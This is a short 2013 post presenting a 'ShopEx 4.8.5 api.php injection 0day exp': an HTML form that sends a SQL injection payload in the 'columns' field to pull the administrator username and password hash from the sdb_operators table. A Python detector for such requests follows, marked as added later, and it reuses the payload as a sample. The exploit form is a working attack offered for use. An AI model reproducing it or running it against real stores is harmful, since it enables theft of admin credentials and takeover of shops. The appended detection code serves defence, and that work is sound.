Technology · August 10, 2013

ShopEx 4.8.5 api.php injection vulnerability 0day exp

Save the following as an HTML file:

<form method='post' action='http://www.hacker-noelle.com/api.php?act=search_dly_type&api_version=1.0'>
<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br />
<input type='submit' value='submit' /><br />
</form>
<script>
//document.forms[0].submit()
</script>
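A detection check for the request this form sends, added here as an example (it is not part of the original post and not ShopEx code): it flags `api.php?act=search_dly_type` requests whose `columns` value is anything other than a plain comma-separated list of column identifiers. It assumes request records with method, URL and form body are available (for example from a reverse-proxy audit log); the host `shop.example` and the benign column names are constructed placeholders.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlsplit

# One column reference: "*" or identifier, optionally table-qualified.
_COL = r"(?:\*|[A-Za-z_]\w*(?:\.[A-Za-z_]\w*)?)"
# The whole value must be a comma-separated list of such references.
SAFE_COLUMNS = re.compile(rf"\s*{_COL}(?:\s*,\s*{_COL})*\s*")


def columns_is_safe(value: str) -> bool:
    """True only when `columns` is a bare list of column identifiers."""
    return SAFE_COLUMNS.fullmatch(value) is not None


def inspect_request(method: str, url: str, body: str = "") -> Optional[str]:
    """Return a finding for a suspicious api.php request, else None."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/api.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    if "search_dly_type" not in params.get("act", []):
        return None
    for value in params.get("columns", []):
        if not columns_is_safe(value):
            return f"columns is not a plain identifier list: {value[:60]!r}"
    return None


# Constructed sample records (method, URL, form body); host and the benign
# column names dt_id/dt_name are placeholders, not ShopEx's real schema.
URL = "http://shop.example/api.php?act=search_dly_type&api_version=1.0"
PAGE_VALUE = ("1,2,(SELECT concat(username,0x7c,userpass) "
              "FROM sdb_operators limit 0,1) as name")
SAMPLES = [
    ("POST", URL, urlencode({"columns": PAGE_VALUE})),
    ("POST", URL, urlencode({"columns": "dt_id,dt_name"})),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(inspect_request(method, url, body) or "ok")
```

The same identifier-only rule can be enforced in the application before the `columns` value reaches the query.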